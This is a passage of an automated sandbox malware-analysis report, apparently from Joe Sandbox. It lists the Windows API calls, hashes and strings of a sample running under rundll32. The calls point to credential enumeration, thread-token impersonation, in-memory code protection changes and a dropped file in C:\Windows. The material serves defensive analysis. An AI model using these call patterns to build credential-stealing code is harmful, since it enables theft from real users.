                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$AllocFreememcpy
                                                • String ID:
                                                • API String ID: 3405790324-0
                                                • Opcode ID: 8384f52ebd7b9405d9f4726a11a60b74c3232973d9f716e572090011a129bfd1
                                                • Instruction ID: 8cd6d32b48e0b1cbd9cf9e606bf8b019fd2a416ffbe2031e765dda818dd6480b
                                                • Opcode Fuzzy Hash: 8384f52ebd7b9405d9f4726a11a60b74c3232973d9f716e572090011a129bfd1
                                                • Instruction Fuzzy Hash: 7D318D7594011AABCB14AFA9CC09EAFBBB9EF58344F458455ED04DB260EB30E714CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 02E512FB
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 02E51312
                                                • GetLastError.KERNEL32 ref: 02E5131F
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateErrorFileLastmemset
                                                • String ID:
                                                • API String ID: 80761035-0
                                                • Opcode ID: 9a549f2bf4fc5880e28f2259bf99e889924dac95412a1c4e3c21a702eb56208e
                                                • Instruction ID: eb7af6fc1ac1b85630e6333f17ba04949807d2f67a3f5c54f37e9360464cd4b4
                                                • Opcode Fuzzy Hash: 9a549f2bf4fc5880e28f2259bf99e889924dac95412a1c4e3c21a702eb56208e
                                                • Instruction Fuzzy Hash: FD11A771AE0234BBEB201A62DC58FAB3E5CDF067A0F109534FD09D9080D625C950C6F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5705B
                                                • HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5705E
                                                • GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5706B
                                                • HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5706E
                                                • GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57080
                                                • HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57083
                                                • GetProcessHeap.KERNEL32(00000000,00000000,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57088
                                                • HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5708B
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: da09a5c2ab54389adf6056ebdaddd238114d6a2d8be1134184aad033a9f622b3
                                                • Instruction ID: 1b2a55fb74fa6874402ed7bd851c1b53b9f4ad880e75489d6677381f6ac06e3e
                                                • Opcode Fuzzy Hash: da09a5c2ab54389adf6056ebdaddd238114d6a2d8be1134184aad033a9f622b3
                                                • Instruction Fuzzy Hash: 62111631650718EFDB24EFA6C994F6AB3F9EF49749F110458E9019B2A1CB70ED50CA60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 02E5711F: GetProcessHeap.KERNEL32(00000008,00000008,00000000,74DF0F00,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E5712E
                                                  • Part of subcall function 02E5711F: HeapAlloc.KERNEL32(00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57131
                                                  • Part of subcall function 02E5711F: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57156
                                                  • Part of subcall function 02E5711F: HeapFree.KERNEL32(00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57159
                                                • CreateThread.KERNEL32(00000000,00000000,02E59EA4,?,00000004,00000000), ref: 02E59F19
                                                • SetThreadToken.ADVAPI32(?,?), ref: 02E59F2B
                                                • ResumeThread.KERNEL32(?), ref: 02E59F38
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02E59F48
                                                • GetLastError.KERNEL32 ref: 02E59F50
                                                • CloseHandle.KERNEL32(?), ref: 02E59F59
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Thread$Process$AllocCloseCreateErrorFreeHandleLastObjectResumeSingleTokenWait
                                                • String ID:
                                                • API String ID: 298440786-0
                                                • Opcode ID: d666027191faa2178077195ca548657aeae9d62caeb9574947a95af4c58eddea
                                                • Instruction ID: 167785aa90bfbb82be3027b42d5e0155d7c144597d6d00a9320ad309bd291588
                                                • Opcode Fuzzy Hash: d666027191faa2178077195ca548657aeae9d62caeb9574947a95af4c58eddea
                                                • Instruction Fuzzy Hash: 93216071D90228FFDF009FA6CD848EEB7B9EF08254B109465EA11E3151D7309E44CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 02E56973: GetTickCount.KERNEL32 ref: 02E56973
                                                • wsprintfW.USER32 ref: 02E56BD3
                                                • EnterCriticalSection.KERNEL32(02E6F124,00000000,00000114,74DF0F00), ref: 02E56BFE
                                                • StrCatW.SHLWAPI(?,?), ref: 02E56C4C
                                                • StrCatW.SHLWAPI(?,02E6B110), ref: 02E56C52
                                                • SetLastError.KERNEL32(0000007A), ref: 02E56C5A
                                                • LeaveCriticalSection.KERNEL32(02E6F124), ref: 02E56C65
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$CountEnterErrorLastLeaveTickwsprintf
                                                • String ID:
                                                • API String ID: 230659905-0
                                                • Opcode ID: 156367b499d4983d1c4e4463efbbbab2466fbf9e4d757400832f6bcc80473e1d
                                                • Instruction ID: 48688875185a6376b30ee779c9392ba43b5fd418c69d8910c62b416aedf4da8b
                                                • Opcode Fuzzy Hash: 156367b499d4983d1c4e4463efbbbab2466fbf9e4d757400832f6bcc80473e1d
                                                • Instruction Fuzzy Hash: 2A112631AD02249BDB246B98DC4DFEA3368FF44394F809961F846DB150EBB0A994CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000,000001BE,?,00000000,?,?,02E51852,00000000,00000000), ref: 02E513AD
                                                • GetLastError.KERNEL32(?,?,02E51852,00000000,00000000), ref: 02E513BA
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateErrorFileLast
                                                • String ID:
                                                • API String ID: 1214770103-0
                                                • Opcode ID: 5b17cc29e9fd6e636fd4371af5633195b6a754b4d20cb40df60eae97e45e6aa4
                                                • Instruction ID: a0963640cb60835899acdb485c9ca483f4354f7b814be0ffac1b104fb475d2b8
                                                • Opcode Fuzzy Hash: 5b17cc29e9fd6e636fd4371af5633195b6a754b4d20cb40df60eae97e45e6aa4
                                                • Instruction Fuzzy Hash: 8111C8716E0225BBE7201A369D48F6B3AADEBC57A4F21A934F919DA080D734C990C670
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memcpy$Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 3823808316-0
                                                • Opcode ID: d764997a9ced905e42e9c8088c6af0d62b6e18cf1b1fcd26bf13544af6d11445
                                                • Instruction ID: 256d127cc97276ef6dc611882e116c5486b03e64eb8bb560f0c863e99c28c7e4
                                                • Opcode Fuzzy Hash: d764997a9ced905e42e9c8088c6af0d62b6e18cf1b1fcd26bf13544af6d11445
                                                • Instruction Fuzzy Hash: FE2182B1651219ABDF009F65DC48AFA37AAEF45308F05A034FD08CB246D739D856DB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 02E5711F: GetProcessHeap.KERNEL32(00000008,00000008,00000000,74DF0F00,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E5712E
                                                  • Part of subcall function 02E5711F: HeapAlloc.KERNEL32(00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57131
                                                  • Part of subcall function 02E5711F: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57156
                                                  • Part of subcall function 02E5711F: HeapFree.KERNEL32(00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57159
                                                • wsprintfW.USER32 ref: 02E56B36
                                                • StrCatW.SHLWAPI(02E6B110,?), ref: 02E56B6E
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E56B90
                                                • HeapFree.KERNEL32(00000000), ref: 02E56B97
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$Free$Allocwsprintf
                                                • String ID: "%ws:%ws"
                                                • API String ID: 3251196674-3918452308
                                                • Opcode ID: c5ba2bf1f457bb2aaf7af7ada2d8e7b6050c6f1d2bde394dfbe0b8653ac27b5f
                                                • Instruction ID: 44c9417d2532e6415f4adda9ab09a833564d4fa60610f3f3cc10793c659cfd88
                                                • Opcode Fuzzy Hash: c5ba2bf1f457bb2aaf7af7ada2d8e7b6050c6f1d2bde394dfbe0b8653ac27b5f
                                                • Instruction Fuzzy Hash: 3C11A235DE0219AFDB00DFA5DD49AAA73FCEB04354F4058A5E901D7110EB709A948B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PathFindFileNameW.SHLWAPI(C:\Windows\dllcm.dat,00000000,?,02E57DC9,?), ref: 02E5832B
                                                • PathCombineW.SHLWAPI(02E57DC9,C:\Windows\,00000000,?,02E57DC9,?), ref: 02E5833A
                                                • PathFindExtensionW.SHLWAPI(02E57DC9,?,02E57DC9,?), ref: 02E58347
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Path$Find$CombineExtensionFileName
                                                • String ID: C:\Windows\$C:\Windows\dllcm.dat
                                                • API String ID: 1635495013-2371566056
                                                • Opcode ID: ad74f0c0e8aff9d3c34d846565dc61406e18ad1c08511a0e2b269aa7f8ceefbd
                                                • Instruction ID: eadf14c27d0a4186932800e707c7e7f9b250621994594e97f07ca9614710dc25
                                                • Opcode Fuzzy Hash: ad74f0c0e8aff9d3c34d846565dc61406e18ad1c08511a0e2b269aa7f8ceefbd
                                                • Instruction Fuzzy Hash: 70E08C313E0334ABAB151AA6EC0896A7F5CEF44BD53449422FD0AC1010DB60C8A1C7E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CommandLineToArgvW.SHELL32(?,?,?,00000000,?,?,02E57E71,?), ref: 02E56A61
                                                • StrToIntW.SHLWAPI(00000000,?,?,00000000,?,?,02E57E71,?), ref: 02E56A75
                                                • StrStrW.SHLWAPI(00000000,02E63FF0,?,?,00000000,?,?,02E57E71,?), ref: 02E56A95
                                                • StrChrW.SHLWAPI(00000000,0000003A,?,?,00000000,?,?,02E57E71,?), ref: 02E56AA2
                                                • LocalFree.KERNEL32(00000000,?,00000000,?,?,02E57E71,?), ref: 02E56ACF
                                                  • Part of subcall function 02E569A2: CommandLineToArgvW.SHELL32(-00000004,?,00000000,00000001,?,?,?,02E56ACD,?,?,00000000,?,?,02E57E71,?), ref: 02E569D8
                                                  • Part of subcall function 02E569A2: LocalFree.KERNEL32(00000000,?,?,?,02E56ACD,?,?,00000000,?,?,02E57E71,?), ref: 02E56A1E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ArgvCommandFreeLineLocal
                                                • String ID:
                                                • API String ID: 1203019955-0
                                                • Opcode ID: 08ccd683eda61dd905b929e3376c1e86939e5349858b430e69d6b5fff3c4d471
                                                • Instruction ID: ccee2c6a4f2a94b0b724ff0dfcfd3ef3281a1487ec92e9e65a4b750254dc8acd
                                                • Opcode Fuzzy Hash: 08ccd683eda61dd905b929e3376c1e86939e5349858b430e69d6b5fff3c4d471
                                                • Instruction Fuzzy Hash: 0621F0349E0224EFDB229F24D9899BE73BCFB44388B94E814F80297101E73099D0CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000034,00000000,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E570A1
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E570AA
                                                • InitializeCriticalSection.KERNEL32(00000000,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E570B3
                                                • GetProcessHeap.KERNEL32(00000008,000000FF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E570DE
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E570E1
                                                  • Part of subcall function 02E57003: GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5705B
                                                  • Part of subcall function 02E57003: HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5705E
                                                  • Part of subcall function 02E57003: GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5706B
                                                  • Part of subcall function 02E57003: HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5706E
                                                  • Part of subcall function 02E57003: GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57080
                                                  • Part of subcall function 02E57003: HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57083
                                                  • Part of subcall function 02E57003: GetProcessHeap.KERNEL32(00000000,00000000,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57088
                                                  • Part of subcall function 02E57003: HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5708B
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$Free$Alloc$CriticalInitializeSection
                                                • String ID:
                                                • API String ID: 2628759760-0
                                                • Opcode ID: c98e684c683cf875d122c3a13c1e6a1459fd872fe268cd57b67ea64a8ab56360
                                                • Instruction ID: 219972b7b89a501713f5c2512387df146b40a3f8dece0e2228bef0df92559d4d
                                                • Opcode Fuzzy Hash: c98e684c683cf875d122c3a13c1e6a1459fd872fe268cd57b67ea64a8ab56360
                                                • Instruction Fuzzy Hash: 9A014B71A907245BD3249F6AD840A1BF7E8FF48750F40491DFA49C7240CB70E850CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 7
                                                • API String ID: 0-1790921346
                                                • Opcode ID: c15631bbab9ba9f037c616653b392078372c531c3707cb2e2bbad0faa19ad7ab
                                                • Instruction ID: 465e98aec9e57f3241607914c655cab9ddd419be001acdb468caff0e0c8ab26d
                                                • Opcode Fuzzy Hash: c15631bbab9ba9f037c616653b392078372c531c3707cb2e2bbad0faa19ad7ab
                                                • Instruction Fuzzy Hash: 16716C7195022AEBDF109F90CC81AFE7B76FF08344F109125FE14A6190E7749AA1EFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 02E51000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,02E5271B,00000062,0000FEFF,?,02CE5020,000001BD), ref: 02E51008
                                                  • Part of subcall function 02E51000: HeapAlloc.KERNEL32(00000000,?,02E5271B,00000062,0000FEFF,?,02CE5020,000001BD), ref: 02E5100F
                                                • memcpy.MSVCRT ref: 02E529F4
                                                • memcpy.MSVCRT ref: 02E52A42
                                                • memcpy.MSVCRT ref: 02E52AD5
                                                Strings
                                                • u)u)uDuGuFu[uDuGu[uFuDu[uGu)u<u%u6uQuuuJJJJJu, xrefs: 02E529EE
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                 • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memcpy$Heap$AllocProcess
                                                • String ID: u)u)uDuGuFu[uDuGu[uFuDu[uGu)u<u%u6uQuuuJJJJJu
                                                • API String ID: 3823808316-1507544218
                                                • Opcode ID: 3b6097f310ba6d4368bf4d2a8f20a6f4753059d017760a0206d8524957213ec6
                                                • Instruction ID: 917550086ddef9537904b4722760b688d9e0cfa033e69fc5ba010a8c96489570
                                                • Opcode Fuzzy Hash: 3b6097f310ba6d4368bf4d2a8f20a6f4753059d017760a0206d8524957213ec6
                                                • Instruction Fuzzy Hash: 5031C6729A0725AAEF21ABA49C05BAF37A6EF04750F10E425FF04BB281E7719D04CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,02E57E14,?,?,?), ref: 02E595CC
                                                • memcpy.MSVCRT ref: 02E595E5
                                                • VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 02E59654
                                                • VirtualFree.KERNEL32(00000000,?,00004000), ref: 02E59674
                                                  • Part of subcall function 02E59286: VirtualProtect.KERNEL32(?,?,00000002,?,00000000), ref: 02E592A3
                                                  • Part of subcall function 02E59286: VirtualProtect.KERNEL32(00000000,?,00000002,?,02CE5020), ref: 02E59301
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                 • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Virtual$Protect$AllocFreememcpy
                                                • String ID:
                                                • API String ID: 2644210-0
                                                • Opcode ID: 6a9d6ad95bac1a2acd7245e39d5327f81130e9c3ecbd126a5abbd3e1892f124f
                                                • Instruction ID: 085ab7e5098ff4b46b47930d9c9731f93a94ccd2a18c8449af00bcd6eee7def1
                                                • Opcode Fuzzy Hash: 6a9d6ad95bac1a2acd7245e39d5327f81130e9c3ecbd126a5abbd3e1892f124f
                                                • Instruction Fuzzy Hash: D721E7716E0371EBCB208B66DC48F9B77D9AB45698F04A518FD06D3242D7B0D8548BF4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,0000FFFF), ref: 02E57B4A
                                                • CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 02E57C02
                                                Strings
                                                Memory Dump Source
